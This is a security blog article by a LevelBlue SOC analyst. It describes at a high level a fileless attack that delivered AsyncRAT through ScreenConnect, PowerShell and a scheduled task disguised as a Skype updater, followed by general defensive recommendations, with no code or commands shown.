Cyber attackers are increasingly turning to stealth rather than brute force and fileless malware is one of their most effective weapons. At LevelBlue, our Security Operations Center (SOC) and Labs teams recently analysed a live attack that used a fileless loader to deliver AsyncRAT, a Remote Access Trojan (RAT) with a range of credential-stealing and surveillance capabilities.
What made this case particularly instructive is the way the attacker relied on trusted utilities and memory-resident techniques to slip past many conventional defences. For organisations already stretched by rising cyber risk, the incident is a reminder that attackers are constantly innovating and exploiting the very tools IT teams depend on to do their jobs.
Inside the attack: From remote access to persistence
The attack began when the adversary gained access via ScreenConnect, a legitimate remote administration tool often used by IT teams. Rather than dropping obvious binaries onto the system, they executed a chain of scripts – a mixture of VBScript and PowerShell – that pulled down further components from external URLs. Those components included encoded .NET assemblies that ultimately unpacked into AsyncRAT, all while avoiding the tell-tale signs that traditional antivirus systems rely on.
One of the most striking aspects was persistence. To maintain a foothold, the attacker created a scheduled task masquerading as a benign “Skype Updater.” The name looked familiar enough to escape casual notice, yet behind the facade it was launching PowerShell commands that kept the malware running. This blend of legitimate looking tools and stealthy scheduling allowed the attacker to survive reboots and evade routine clean-up.
The analysis of the command structure revealed multiple layers and a modular design. The AsyncClient executable supported a plugin architecture capable of dynamically loading payloads. Encryption routines based on AES secured its communications, and the malware handled a wide range of functions: from stealing credentials and clipboard contents to exfiltrating browser history. Each capability was wrapped in code designed to frustrate reverse engineering and delay detection.
Why this matters for organisations
t would be tempting to view this as an isolated case. The reality is that these techniques are spreading. Unfortunately, fileless malware is not confined to elite threat actors or rare incidents. It thrives precisely because it takes advantage of assumptions many IT teams make every day.
First, there is a natural trust placed in administrative tools. PowerShell, VBScript, ScreenConnect are essential to the day-to-day running of IT environments. Yet in this incident, those same tools became the delivery mechanism for malware. When organisations whitelist or relax monitoring on them, they unwittingly open a pathway for attackers.
Second, reliance on file-based signatures leaves a blind spot. Security tools that only scan for known malicious binaries on disk will struggle against code that executes entirely in memory. Fileless techniques shift the battle from “what’s written on the hard drive” to “what’s happening in real time in memory and processes.” Without behavioural monitoring, attackers gain a significant advantage.
Finally, the data at risk is not abstract. AsyncRAT is designed to exfiltrate high-value information: login credentials, browser histories, clipboard contents. For a company handling sensitive customer data, intellectual property, or financial records, for example, a single compromise could have regulatory, reputational and operational consequences far beyond the cost of initial remediation.
Defending against the fileless threat
Visibility into behaviour is paramount. It is no longer sufficient to know what files are present on an endpoint, teams need to understand how trusted tools are being used. PowerShell itself is not malicious, but PowerShell executing a heavily encoded script from an external URL should raise alarms. Monitoring command-line arguments, parent-child process relationships, and unusual usage patterns can provide the early warning signs that static scans will miss.
Equally important is the ability to analyse what resides in memory. Many modern endpoint detection and response (EDR) tools provide hooks for this, but they require tuning and validation. Organisations should test whether their tools can detect encoded .NET assemblies loaded at runtime, or identify AES decryption routines operating in memory. Without this capability, attackers will continue to exploit the blind spot.
Persistence mechanisms also warrant closer scrutiny. Scheduled tasks are a powerful feature, but they are often overlooked during security audits. Regularly reviewing tasks for suspicious names or unexplained triggers can reveal attempts to masquerade as legitimate services. In the case we analysed, the attacker relied on nothing more exotic than the familiarity of a Skype “Updater” to maintain access.
Network monitoring remains another crucial line of defence. Fileless malware still needs to communicate with command and control (C2) infrastructure. Even when communications are encrypted, patterns can be detected: unusual destinations, odd timing of traffic, or repetitive bursts of small data transfers. By combining network indicators with threat intelligence – such as the hardcoded domains and encryption keys we extracted – defenders can identify compromises that may otherwise remain invisible.
Finally, organisations should not underestimate the importance of least privilege and whitelisting. Allowing every endpoint to run remote access software or to execute arbitrary PowerShell scripts creates an environment that attackers can easily abuse. Restricting which tools are permitted, and under which user contexts, narrows the attack surface considerably.
The road ahead
Looking beyond this specific case, we see several trends shaping the threat landscape.
Attackers are leaning more heavily on legitimate remote administration tools as an initial foothold. They are disguising malware under names that echo everyday software updates or system services. Their use of encryption continues to evolve, with payloads only fully revealed when certain triggers are met. And critically, they are aiming for both theft and leverage, using exfiltrated data to threaten exposure, demand ransoms, or erode customer trust.
For IT leaders, this means preparation cannot be reactive. Fileless techniques blur the line between normal administration and malicious behaviour. Without proactive monitoring, behavioural baselines, and the capacity to hunt for indicators across memory, processes and network traffic, defenders will always be one step behind.
The AsyncRAT incident we investigated serves as a warning. But whilst it highlights how attackers are accelerating sophistication – fileless loaders, trusted utility abuse, minimal traces – it also shows what defenders can do when they adopt a proactive approach to shift the balance back in their favour.
Sean Shirley
Sean Shirley is SOC Analyst at LevelBlue.
